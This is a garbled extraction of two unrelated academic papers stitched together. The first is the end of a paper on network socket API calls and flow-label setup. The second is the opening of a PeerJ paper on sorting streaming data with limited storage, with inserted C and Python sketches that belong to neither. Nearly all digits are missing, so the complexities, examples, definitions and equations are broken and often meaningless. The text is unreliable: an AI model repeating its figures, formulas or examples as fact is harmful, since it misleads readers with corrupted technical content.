exceeds the length of the data buffer, the excess is discarded, depending on the type of socket interface used to receive the message. if the socket interface does not receive the information, it will always wait for the information unless the socket interface is non-blocking. when the socket interface is non-blocking, the return value is - and the errno value is eagain. the recvmsg call the msghdr structure, defined in the header file <sys/socket.h>. ) returned value the length of the received data is returned on success, - is returned on error, and errno represents the value of the error type. h. send(), sendto(), sendmsg() ) head file #include <sys/types.h> #include<sys/socket.h> ) ( ) prototype intsend(int s, const void *msg, size_tlen, int flags); intsendto(int s, const void *msg, size_tlen, int flags, conststructsockaddr *to, socklen_ttolen); intsendmsg(int s, conststructmsghdr *msg, int flags); ) description the send (), sendto, and sendmsg calls are used to transfer information to other interfaces. the send () call applies only to the connection-oriented socket interface, while the sendto and sendmsg calls apply to all situations. the destination address is set by the parameter to, its length is the parameter tolen, and the length of the message is represented by the parameter len. if the length of the message is too large to be sent all at once by the low-level protocol, - is returned, and errno is set to emsgsize. 
if the length of the send message is greater than the length of the socket interface send buffer, the send call will normally block unless the socket interface is set to a non-blocking mode. in non-blocking mode - is returned and errno is set to eagain. the select call can determine whether more data can be sent. the structure msghdr is defined in the header file <sys/socket.h>. ) returned value the length of the sent data is returned on success, - is returned on error, and errno represents the value of the error type. i. ioctl() ) head file #include <sys/ioctl.h> ) prototype intioctl(int d, intrequest, ...); ) description ioctl( ) calls operate on the parameters of the underlying device. parameter d is the file handle, and the parameter request determines the type and size of the back parameters. see the <sys/ioctl.h> for the macro definition used to describe the parameter request. ) returned value is returned on success, - is returned on error, and errno represents the error type value. international journal of advanced network, monitoring and controls volume , no. , j. getsockopt(),setsockopt() ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype intgetsockopt(int s, intlevel, intoptname, void *optval, socklen_t *optlen); intsetsockopt(int s, int level, intoptname, const void *optval, socklen_toptlen); ) description the getsockopt() and setsockopt() calls can operate on the options of the socket interface. options exist at multiple protocol levels, but are always represented at the highest socket interface level. when socket interface options are setting, it must be specify the level name and option name. for the socket interface level option, the level is called sol_socket. for other levels of protocol, other protocol control numbers are provided, such as the tcp protocol, and the level name must be the tcp series. the parameters optval and optlen are used when setsockopt calls access option values. for the getsockopt calls, they are buffers that return the request option value; the optlen parameter starts with the size of the buffer optval, and returns with the buffer size of the actual return value. if no option value can be returned, the parameter optval is set to null. the optname and option parameters are sent to the appropriate core protocol module for interpretation without explanation. in the header file <sys/socket.h>, there is a detailed definition of the socket interface level and option structure, and the option formats and names for different protocol levels vary greatly. most interface-level options take an integer value as the parameter optval, and for setsockopt calls, the parameter must be non-zero to support boolean options, or zero to disable. in the design of ipv stream label, the following call can be used: int on = ; struct in _flowlabel_req freq; structin _addrdst_addr; memcpy(&(freq.flr_dst),&dst_addr, ); freq.flr_label = htonl( x f); freq.flr_action = ipv _fl_a_get; freq.flr_share = ipv _fl_s_excl; freq.flr_flags = ipv _fl_f_create; freq.flr_expires = ; freq.flr_linger = ; freq.__flr_pad = ; setsockopt(s, ipproto_ipv , ipv _flowinfo_send, &on, sizeof(int)); setsockopt(s, ipproto_ipv , ipv _flowinfo, &on, sizeof(int)); setsockopt(s, ipproto_ipv , ipv _flowlabel_mgr, &freq, sizeof(structin _flowlabel_req)); the above code sets the stream label of socket s to f, where the destination address of the stream label is defined in dst_addr. 
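because the listing above has lost its line structure in this text, a compilable form of the same call sequence is sketched below. the names follow the standard linux ipv6 flow-label interface (struct in6_flowlabel_req, the ipv6_fl_* constants and the ipv6_flowinfo/ipv6_flowlabel_mgr socket options, declared by the system's ipv6 headers); whether the paper's own stack reuses these identifiers or defines analogous ones, and the concrete label value, are assumptions here.

    int on = 1;
    struct in6_flowlabel_req freq;
    struct in6_addr dst_addr;                           /* destination address of the flow label */

    memset(&freq, 0, sizeof(freq));
    memcpy(&freq.flr_dst, &dst_addr, sizeof(struct in6_addr));
    freq.flr_label   = htonl(0x12345);                  /* placeholder 20-bit label value */
    freq.flr_action  = IPV6_FL_A_GET;
    freq.flr_share   = IPV6_FL_S_EXCL;
    freq.flr_flags   = IPV6_FL_F_CREATE;
    freq.flr_expires = 0;
    freq.flr_linger  = 0;

    setsockopt(s, IPPROTO_IPV6, IPV6_FLOWINFO_SEND, &on, sizeof(int));
    setsockopt(s, IPPROTO_IPV6, IPV6_FLOWINFO, &on, sizeof(int));
    setsockopt(s, IPPROTO_IPV6, IPV6_FLOWLABEL_MGR, &freq, sizeof(struct in6_flowlabel_req));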
structure in flowlabelreq is defined as follows struct in _flowlabel_req{ struct in _addrflr_dst; __u flr_label; __u flr_action; __u flr_share; __u flr_flags; __u flr_expires; __u flr_linger; international journal of advanced network, monitoring and controls volume , no. , __u __flr_pad; }; ) returned value is returned on success, - is returned on error, and errno represents the error type value. iii. ipv development instruction ) development environment centos operating system with linux operating environment with ipv kernel; vmware virtual machine image:: centos _ ipv _ dev_vm. the compiled program copy in centos _ipv _dev_vm virtual machine image, it can run normally, provides the virtual machine application development and compilation environment, c language headers file and ipv _linux kernel. ) ipv network application development directory: /develop development document directory: /develop /docs the demo directory: /develop /test demo readme /develop /test /readme ) test program the test program mainly changes the socket family program file. cd /develop /test make ) demo operation #configure the ipv address ifconfig eth add [ [ [ ] #start the ipv server program: /test _tcpserver #start the ipv client program: /test _tcpcli [ [ [ ] verify the caught: tcpdump -s -i any -w t.cap, or wireshark with ipv plugin open t.cap. iv. conclusion this paper introduces the commonly used socket able and interface functions, including creating a socket, binding function, link function, monitoring function and accept function, read the function and writing function, etc., each function is connected the header files, prototyping, description, and the return value, these are the basis of network programming, mastering these functions, which plays a major role for application development. references [ ] https://zh.wikipedia.org/wiki/berkeley%e %a % %e % e%a % e %ad% , wikipedia: berkeley sockets - - , (goodheart , p. ), (goodheart , p. ) [ ] cisco networking academy program, ccna and companion guide revised [ ] third edition, p. , isbn - - - [ ] jack wallen ( - - ). "an introduction to the ss command". [ ] v. s. bagad, i. a. dhotre ( ), computer networks ( th revised edition, ed.), technical publications pune, p. [ ] ian griffiths for iang on tap. august, . raw sockets gone in xp [ ] "raw( ): ipv raw sockets - linux man page". die.net. [ ] "raw ip networking faq". faqs.org. [ ] www- .ibm.com - anynet guide to sockets over sna [ ] books.google.com - unix network programming: the sockets networking api [ ] books.google.com - designing bsd rootkits: an introduction to kernel hacking [ ] historyofcomputercommunications.info - book: . tcp/ip and xns - [ ] mit.edu - the desktop computer as a network participant.pdf correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor suluk chaikhan, suphakant phimoltares and chidchanok lursinsap advanced virtual and intelligent computing (avic) research center, department of mathematics and computer science, faculty of science, chulalongkorn university, bangkok, thailand abstract tremendous quantities of numeric data have been generated as streams in various cyber ecosystems. sorting is one of the most fundamental operations to gain knowledge from data. 
however, due to size restrictions of data storage which includes storage inside and outside cpu with respect to the massive streaming data sources, data can obviously overflow the storage. consequently, all classic sorting algorithms of the past are incapable of obtaining a correct sorted sequence because data to be sorted cannot be totally stored in the data storage. this paper proposes a new sorting algorithm called streaming data sort for streaming data on a uniprocessor constrained by a limited storage size and the correctness of the sorted order. data continuously flow into the storage as consecutive chunks with chunk sizes less than the storage size. a theoretical analysis of the space bound and the time complexity is provided. the sorting time complexity is o (n), where n is the number of incoming data. the space complexity is o (m), where m is the storage size. the experimental results show that streaming data sort can handle a million permuted data by using a storage whose size is set as low as % of the data size. this proposed concept can be practically applied to various applications in different fields where the data always overflow the working storage and sorting process is needed. subjects algorithms and analysis of algorithms, artificial intelligence, data science keywords algorithms, sorting, memory, algorithm design and analysis, computational intelligence introductions currently, the growth of data consumption by internet users has exponentially increased (laga et al., ; bey ahmed khernache, laga & boukhobza, ), and a massive storage size is required to store all incoming data to avoid any data loss in case of storage overflow (thusoo et al., ; katal, wazid & goudar, ; witayangkurn, horanont & shibasaki, ; mehmood et al., ). however, many applications such as data management, finance, sensor networks, security-relevant data, and web search possibly face this unexpected situation of a storage overload issue (lee et al., ; babcock et al., ; keim, qu & ma, ; cardenas, manadhata & rajan, ; dave & gianey, ). this issue induces the problem of representing big data with a limited storage size. furthermore, some primitive operations such as the classic sorting algorithms (e.g., quick sort, heap sort) cannot be implemented due to the restrictive constraint of storing all sorted data inside the storage during the sorting process. a sorting algorithm is the first important step of many algorithms (cormen et al., ; huang, liu & li, ) such as searching and finding a closest pair (singh & sarmah, ; tambouratzis, ).
generally, when referring to data storage of a computer, it can be either primary storage (internal storage) or secondary storage (external storage). the size of primary storage is much smaller than that of the secondary storage. with reference to the size of storage, there are two types of sorting: internal sort and external sort. all data to be sorted by an internal sorting algorithm must be entirely stored inside the primary storage. some of traditional internal sorting algorithms are bubble sort, insertion sort, quick sort, merge sort, and radix sort. however, if the data overflow the primary storage, the overflow must be stored in the secondary storage. in this case, external sort algorithms can be employed. although these classic sorting algorithms are very efficient in terms of time and space complexities, the actual quantity of data generated yearly on the internet has grown tremendously faster than the growth rate of storage capacity based on the current fabrication technology (for both primary storage and secondary storage). this severe condition makes the classic sorting algorithms, where all data must be stored inside the computer, very inefficient because all overflowed data are lost. in this study, both internal and external storage are viewed as one unit of storage with a limited size. this size is not gradually augmented during the sorting process of continuously incoming data. the challenging problem to be studied is how to sort the data under the constraints of limited storage capacity and storage overflow. the data are assumed to flow into the storage as a sequence of data chunks with various sizes less than or equal to the storage size. recently, many internal sorting algorithms have been remodeled by reducing comparison, swapping, and the time complexity to reduce the sorting time. farnoud, yaakobi & bruck ( ) proposed an algorithm that sorts big data based on limited internal storage, but the result is a partial sort. concoms sort (agrawal & sriram, ) is an algorithm that uses a swapping technique with no adjacent swapping. it reduces the execution time in some cases when compared to selection sort and outperforms bubble sort in every case. in particular, in the case that the input is a descending sequence, concoms sort is more efficient than both traditional algorithms. mapping sort (osama, omar & badr, ) is a new algorithm that does not use comparisons and the swapping technique but it uses the mapping technique instead. this algorithm achieved the worst case time complexity of o(n) + o(n log n). vignesh & pradhan ( ) proposed a sorting algorithm by improving merge sort. it uses multiple pivots to sort data. the execution time of this algorithm is better than quick sort and merge sort in the best case and the average case, respectively. in addition, proximity merge sort (franceschini, ) was proposed by improving the algorithm with an in-place property. faro, marino & scafiti ( ) modified insertion sort to reduce the time complacency by inserting multiple elements for one iteration. the time complexity is oðn þ hÞ, where h n. idrizi, rustemi & dalipi ( ) modified the sorting algorithm by separating the data sequence into three chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parts, namely, negative numbers, zero numbers, and positive numbers. after the data in each part are sorted by printing the result, the algorithm can decrease the comparison by a separating process. 
bidirectional conditional insertion sort algorithm (mohammed, amrahov & Çelebi, ) is a two-pivot insertion sort algorithm using the left comparator and right comparator. it is faster than insertion sort, and the time complexity is nearly close to o(n . ). brownian motus and clustered binary insertion sort methods (goel & kumar, ) are algorithms that adapted insertion sort and binary insertion sort to reduce the comparison and the execution time. both algorithms are suitable for sorting partial data. internal sorting algorithms in the literature have focused on reducing the time for processing, but the storage issue for big data has been ignored. presently, accessing a large piece of information or big data is simple because of rapid technological advancements such as the cloud (al-fuqaha et al., ; kehoe et al., ; vatrapu et al., ) and network technology (yiliang & zhenghong, ; zhao, chang & liu, ; zhai, zhang & hu, ). one of the issues for sorting big data is the restricted internal storage, which is usually smaller than the size of big data. all big data cannot be stored in the internal storage. therefore, the internal sorting algorithms cannot sort big data at one time. the external sorting algorithms are developed from the classic merge sorting algorithm to sort big data, which is separated into two phases: ( ) the sorting phase sorts a small chunk of big data in the internal storage. after sorting, all sorted chunks are stored in the external storage and ( ) the merging phase combines all sorted chunks from the sorting phase into a single sorted list. recently, tarabyte sort (o’malley, ) has used three hadoop applications, namely, teragen, terasort, and teravalidate, to sort big data. this algorithm sorts billion data in s. this process is very fast, but it is expensive because it requires many processing units for sorting. kanza & yaari ( ) studied external sorting problems and designed multi-insertion sort and scs-merge v to v . the objective of these algorithms is to decrease the write cost of intermediate results of sorting. active sort (gantz & reinsel, ) is an algorithm that merges sorted chunks inside ssds and is applied with hadoop to reduce the number of reading and writing data. montres (laga et al., ), the algorithm designed for ssds, can reduce the read and write cost of i/o in a linear function. external sorting algorithms in the literature have focused on reducing the read and write cost in terms of the execution time for processing, but the storage issue for keeping big data is still ignored. liang et al. ( ) proposed a new algorithm, namely, b*-sort, which was designed on nvram and applied on a binary search tree structure. in addition, farnoud, yaakobi & bruck ( ) studied approximate sorting of streaming permuted data with limited storage; however, the result is not exactly sorted data, and only an approximate result is obtained when determining the data positions. conversely, the approximate positions of ordered data can be provided when using the values as inputs. elder & goh ( ) studied permutation sorting by finite and infinite stacks. although all possible permutations cannot be sorted, the exact order and values can be obtained. let n be the total streaming numbers to be sorted and m ≪ n be the limited size of working chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ storage. 
the table below summarizes the efficiency of various classic sorting methods and our proposed method (streaming data sort) in terms of seven characteristics: requiring extra storage, preserving the input appearance order, time complexity, space complexity, sorting streaming data, correct sorting order, and correct retrieved value by the sorted order.

this article proposes a new algorithm called streaming data sort for sorting streaming data with a limited storage size by using only a single central processing unit. the proposed algorithm can correctly and stably handle a streaming data size of at least . times larger than the size of the working storage. the following concerns are emphasized in this study.

- all data must be in the exactly correct order after being sorted. no approximate or partial ordering is allowed in this study.
- the time complexity of streaming data sort over all iterations is o(n).

constraints

in the stationary data environment, all classic sorting algorithms are based on the assumption that all numbers to be sorted must be entirely stored in the working storage of a computer during the sorting process. this implies that the whole data set cannot exceed the working storage size during the sorting process. the figure referenced here illustrates the storage constraint of the working storage in streaming data sort. however, in the streaming data environment, the data continuously flow into the computer one chunk at a time, and the number of incoming chunks is unknown in advance. if the size of a data chunk is larger than the working storage size, then the overflow will be permanently discarded from the computer, which makes the sorted result wrong. to make the study feasible for analysis and practice, the following constraints are imposed.

table: comparison of sorting algorithms on streaming data. n is the total streaming numbers to be sorted and m ≪ n is the limited size of working storage.

sorting algorithm | requiring extra storage | preserving input appearance order | time complexity | working space complexity | applicable to streaming data | correct order | correct value
bubble sort | no | yes | o(n^2) | o(n) | no | yes | yes
selection sort | no | no | o(n^2) | o(n) | no | yes | yes
insertion sort | no | yes | o(n^2) | o(n) | yes | yes | yes
quick sort | no | no | o(n^2) | o(n) | no | yes | yes
merge sort | yes | yes | o(n lg n) | o(n) | no | yes | yes
heap sort | no | no | o(n lg n) | o(n) | no | yes | yes
permutation sort (farnoud, yaakobi & bruck) | no | no | o(n/ω(log n)) | o(n) | no | yes | yes
permutation sort (elder & goh) | yes | yes | n/a | o(n) | yes | no | no
external sorting | yes | yes | n/a | o(n) | yes | yes | yes
streaming data sort | no | yes | o(n) | o(m) | yes | yes | yes

1. the sorting process is performed by using only a fixed working storage of size m. this working storage stores the incoming data, the previously sorted data, and other temporary data structures generated during the sorting process. no extra storage module is added during this period. the proposed sorting algorithm and the operating system are not stored in this working storage.
2. all numbers are integers. floating-point numbers must first be transformed into integers.
3. at any time t, the size of the previously sorted data in compact form plus the size of the next incoming data chunk (h) must not exceed m.
4. the present incoming data chunk is completely discarded after being processed by the proposed sorting algorithm.
5. only four types of relation between any two temporal consecutive numbers di and di+1 are studied in this paper.
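to make the input model behind these constraints concrete, the following sketch simulates data arriving in chunks that never exceed the working storage and checks the storage budget before each chunk is processed. the chunk generator, the budget check, and the toy growth of the compact form are invented for this illustration and are not part of the paper.

```python
import random

def chunked_stream(data, max_chunk):
    """yield the data as consecutive chunks of varying size, never larger than
    max_chunk, mimicking the streaming input model assumed above."""
    i = 0
    while i < len(data):
        size = random.randint(1, max_chunk)
        yield data[i:i + size]
        i += size

def check_working_storage(compact_size, chunk_size, m):
    """constraint 3: the compact form of previously sorted data plus the next
    incoming chunk must fit inside the fixed working storage of size m."""
    if compact_size + chunk_size > m:
        raise MemoryError("the working storage of size m would overflow")

# example run: a working storage of m = 10 cells and a stream of 30 integers
# arriving in chunks of at most 4 numbers; the sorter state is a placeholder.
m = 10
compact_size = 0
for chunk in chunked_stream(list(range(30)), max_chunk=4):
    check_working_storage(compact_size, len(chunk), m)
    # ... the chunk would be sorted and folded into the compact form here,
    # and then discarded (constraint 4) ...
    compact_size = min(m - 4, compact_size + 1)   # toy growth of the compact form
```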
the details and rationale of concentrating on these four types will be elaborated later. figure storage constraint. case for d ≤ m where all data must be in the storage. case for d ≫ m and d ≤ m + e where data overflow the storage. case for mwork = m + e, the constraint of this study. full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the second constraint is the main concern of this study. after sorting the first incoming data chunk, all numbers are captured in a compact form and all sorted numbers are completely discarded. this compact form is used in conjunction with the next incoming data chunk for sorting. to avoid a storage overflow obstruction, the fourth constraint must be presented. the last constraint is derived from real-world data sets. from the observation of real-world streaming data sets from the uci repository (dua & graff, ) such as the census income, diabetes -us hospitals, incident management process event log, pm . of five chinese cities, kegg metabolic relation network, beijing multi-site air quality, and buzz in social media, it is remarkable that most of the different values between two temporal consecutive numbers are between . and . on average. hence, only four types of relations between any two temporal consecutive numbers are the focus. the definition of each type will be given in the next section. definitions and notations definition the window at time t, denoted by w(t) = (d , d , …, dh), is a sequence of h ≤ m incoming numeric data at time t. definition the sorted window of w(t) at time t, denoted by w(t) = (w , w , …, wh | wi = dj, wi + = dk and wi; wiþ wðtÞ : wi < wiþ Þ, is a sequence of increasingly sorted numeric data of w(t). definition type- subsequence t = (wi, …, wi + l) � wðtÞ is a sequence such that ∀ wi, wi + ∈ t : |wi − wi + | = . an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to , namely, (| − |,| − |,| − |,| − |) = ( , , , ). definition type- subsequence t = (wi, …,wi+l) ⊆w (t) is a sequence such that ∀wi+a, wi+a+ ∈ t , ≤ a ≤ l− : |wi+a−wi+a+ | = when a is even and |wi+a−wi+a+ | = when a is odd. an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to either or , namely, (| – |, | – |, | – |, | – |) = ( , , , ). definition type- subsequence t = (wi, …,wi+l) ⊆w (t) is a sequence such that ∀wi+a, wi+a+ ∈ t , ≤ a ≤ l− : |wi+a−wi+a+ | = when a is even and |wi+a−wi+a+ | = when a is odd. an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to either or , namely, (| – |, | – |, | – |, | – |) = ( , , , ). definition type- subsequence t = (wi,…,wi+l) ⊆ w (t) is a sequence such that ∀wi,wi+ ∈ t : |wi−wi+ | = . an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to either or , namely, (| – |, | – |, | – |, | – |) = ( , , , ). during the sorting process by the proposed algorithm, it is necessary to identify the type of subsequence to be sorted first. given a subsequence (wi,…,wi+l) ∈w (t), the type of this subsequence can be easily identified as type-p by setting p ¼ wiþ þ wiþ − ðwi þ Þ ( ) chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ each already sorted subsequence (wi, …, wi + l) ∈ w (t) is compactly written in a form of (u, v)(p) where u = wi and v = wi + l are used during the sorting process to minimize the storage use. (u, v)(p) is named compact group p. any numeric data in between u and v are called removed data. these removed data are not considered and can be removed after the sorting process. for example, subsequence ( , , , , ) is compacted as ( , )( ); ( , , , , ) is compacted as ( , )( ); ( , , , ) is compacted as ( , )( ); and ( , , , ) is compacted as ( , )( ). note that a sequence w(t) may contain several compact groups and some single numbers. suppose w(t) = ( , , , , , , , , , , ). this sequence consists of the following subsequences ( , )( ), ( , )( ). thus, w(t) can be rewritten in another form of compact groups and a set of single numbers as w(t) = (( , )( ), , ( , )( ), ). however, it is possible to find another set of compact groups from w(t) as wðtÞ¼ ððð ; Þð Þ; ð ; Þð Þ; ð ; Þð Þ; Þ. obviously, different sets of compact groups for any w(t) use different storage sizes to store them. to distinguish between w(t) written in the original sequence of numbers and w(t) written in a form of compact groups having a set of single numbers, the notation q(t) is used instead of w(t) to denote a combination set of compact groups and single numbers. each compact group i in q(t) is denoted by qi. in fact, either each compact group or a single number in q(t) can be considered as an element of q(t). for example, if w(t) = ( , , , , , , , , , , ), then q(t) = (( , )( ), , ( , )( ), ) such that q = ( , ) ( ), q = ( , ) ( ). all removed data of compact group (u, v)(p) will be occasionally retrieved to obtain a complete sorted subsequence in order to involve the new incoming subsequence in the sorting process. hence, each retrieved number is denoted by ri to make it different from each input number wi during the sorting process. the retrieved sequence of (u, v) (p), denoted r((u, v)(p)), can be obtained by using the following rules. r ¼ u ( ) r þl ¼ v ( ) riþ ¼ ( ri þ for p ¼ ri þ ðri � r þ p � Þ mod for p ¼ ; ri þ for p ¼ ( ) to illustrate how to retrieve all numbers from a compact group, consider an example of sequence ( , , , ) represented by the compact group ( , )( ). the retrieved numbers of ( , )( ) can be computed as follows: since p = , r = , r = ( ) + (( ) − ( ) + ( ) − ) mod = , r = ( ) + (( ) − ( ) + ( ) − ) mod = , r = ( ) + (( ) − ( ) + ( ) − ) mod = , r = = v. accordingly, r ð ; Þð Þ � � ¼ ð ; ; ; Þ. concepts the size of each incoming sequence is assumed to be at most the size of working storage. to make the working storage available for storing the next incoming data chunk after sorting the current chunk, it is required to represent some sorted subsequent numbers in a form of a compact group. however, not all subsequent sorted numbers can be compacted. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the properties and concept of a compact group representation will be discussed next. the sorting process consists of the following three main steps. . transform the initial incoming sequence w( ) into a set of compact groups qi ∈ q ( ). . at time t, obtain the next incoming sequence and insert each number wi ∈ w (t) into the previous q(t − ) at the appropriate position. . 
if there exist any adjacent compact groups qi = (a,b) (a) and qi + = (c,d) (β) such that the retrieved sequences r((a,b)(a)) and r((c,d)(β)) satisfy one of the types of subsequences, then form a new compact group from the sequences of r((a,b)(a)) and r((c,d)(β)). steps and are iterated until there are no more incoming sequences. the details of each step will be discussed next. figure shows an example of how the proposed approximate sorting works. the storage size |mtot| is . the first incoming -number sequence, that is, ( , , , , , , , , , ), fills the whole storage. this sequence is sorted in an ascending order and forms a set q( ) = (( , )( ), , ( , )( ), ( , )( )), as shown in fig. a. the size of the storage used is decreased to . the second incoming sequence ( , , ) is inserted into some compact groups in q( ) to obtain q( ) = (( , )( ), , ( , )( ), , ( , )( )), as shown in fig. b. the size of the storage used after the second incoming sequence is increased to . the third incoming sequence ( , ) is separately grouped with ( , )( ) and ( , )( ) from the previous q( ) to make a new q( ) = (( , )( ), , ( , )( ), , ( , )( )). observe that the compact group ( , )( ) can be grouped with the single number to make ( , )( ). therefore, q( ) = (( , )( ), , ( , )( ), ( , )( )). the fourth incoming sequence ( , , ) is possibly and separately grouped with ( , )( ), ( , )( ), and ( , )( ) in q( ) to obtain q( ) = (( , )( ), , ( , )( )). the last incoming sequence ( , ) is possibly and separately grouped with ( , )( ), , ( , )( ) in q( ) to obtain q( ) = (( , )( )). proposed algorithm the proposed sorting algorithm is composed of the following two major steps. these steps are based on the constraints previously imposed in constraints section. . obtain the first input number sequence and sort the number in an ascending order. then, create q( ), a set of compact groups and a set of a single number. . at time t, obtain the next set of number sequences and insert the numbers into q(t − ) to create the next q(t). . repeat step until there are no more new incoming sequences. the deils of steps and will be discussed in the following sections. creating compact groups there are four types of compact groups. to identify the type of compact group from a number sequence, four counters c , c , c , and c for type- , type- , type- , and type- , respectively, are employed. let s(i) be the status condition of type-i. the value of s(i) is defined as follows. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð Þ ¼ wkþi � wkþi� ¼ for � i � m otherwise: � definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð Þ ¼ ðwkþi� � wkÞ mod þ ¼ wkþi � wkþi� for � i � m otherwise: � figure an example of streaming data sort. the sorting steps are illustrated in subfigures (a), (b), (c), (d) and (e). full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
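the compact-group idea introduced above (store only the first element u, the last element v, and the type p of a sorted run, and regenerate the removed data on demand) can be sketched as follows. the sketch models only the simplest kind of run, one whose consecutive elements differ by exactly 1; the class name and method names are illustrative assumptions, not the authors' implementation.

```python
class CompactGroup:
    """a sorted run stored as (u, v)(p): only the end points and the type are
    kept; the elements in between (the 'removed data') are regenerated on
    demand. only unit-step runs are modelled in this sketch."""

    def __init__(self, u, v):
        assert u <= v
        self.u, self.v = u, v

    def size(self):
        """number of original elements represented by the group."""
        return self.v - self.u + 1

    def retrieve(self):
        """regenerate the full sorted subsequence r((u, v))."""
        return list(range(self.u, self.v + 1))

    def contains(self, x):
        """true if x falls inside the span covered by the group."""
        return self.u <= x <= self.v

def compact(sorted_run):
    """replace a unit-step sorted run by its compact form, or return the
    numbers unchanged (as 'single numbers') when they cannot be packed."""
    if len(sorted_run) >= 2 and all(b - a == 1
                                    for a, b in zip(sorted_run, sorted_run[1:])):
        return CompactGroup(sorted_run[0], sorted_run[-1])
    return list(sorted_run)

# example: the run 4,5,6,7,8 occupies two storage cells instead of five
g = compact([4, 5, 6, 7, 8])
print(g.size(), g.retrieve())   # -> 5 [4, 5, 6, 7, 8]
```

the saving in working storage comes precisely from keeping two end points per packed run instead of every number in the run.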
https://peerj.com/computer-science/ definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m<h is a constant defined by: sð Þ ¼ ðwkþi� � wk þ Þ mod ¼ wkþi � wkþi� for � i � m otherwise: � definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð Þ ¼ wkþi � wkþi� ¼ for � i � m otherwise: � the notations in this paper are given in table . q(t)||s|| c denotes orderly concatenating q(t), s, c according to the sorted order of all elements in w(t). the quantity of removed data of type- is greater than those of the other types. the difference of the first and the last data of a type- compact group is larger than the differences in the other types. to greatly reduce and control the storage size, the sequences of types and are detected before the sequences of types and . suppose the following sequence ( , , , , ) is given. if types and are considered before types and , then the given sequence is compacted as , ( , )( ), which requires units of storage to store numbers , , , . however, if types and are considered before types and , then the given sequence is compacted as ( , )( ), , , which requires units of storage to store numbers , , , , . theorem if p ¼ arg max �i� ðciÞ, then p denotes the correct type of the compact group. proof: suppose the sorted sequence is w(t) = (w , w , …, wh). we consider each type of compact group. let s(i)t be the status condition of type-i at time t and t (i) = (s(i) , s (i) , …, s (i) h ) be the sequence of s(i)t . there are four cases to be investigated. table notations in streaming data sort. notations short definitions examples di the i th incoming datum − , , (d ,d ,d ,…) sequence of streaming data (− , , ,…) h window size at iteration t , , , wi the i th member in a window , , w(t) unsorted window at iteration t ( , , , ,…) w(t) sorted window at iteration t ( , , , ,…) p type of sub-sequence , , , tp type-p sub-sequence ( , , , , , ) (u, v)(p) type-p compact group ( , )( ) ri the i th retrieved number , , , , , r((u, v)(p)) retrieved sequence of (u, v)(p) ( , , , , , ) s(i) status condition of type-i , qi the i th compact group ( , )( ), ( , )( ) s set of single numbers { , } c set of compact groups {( , )( ), ( , )( )} q(t) combining set of c and s at iteration t {( , )( ), , , ( , )( )} chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c . case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . 
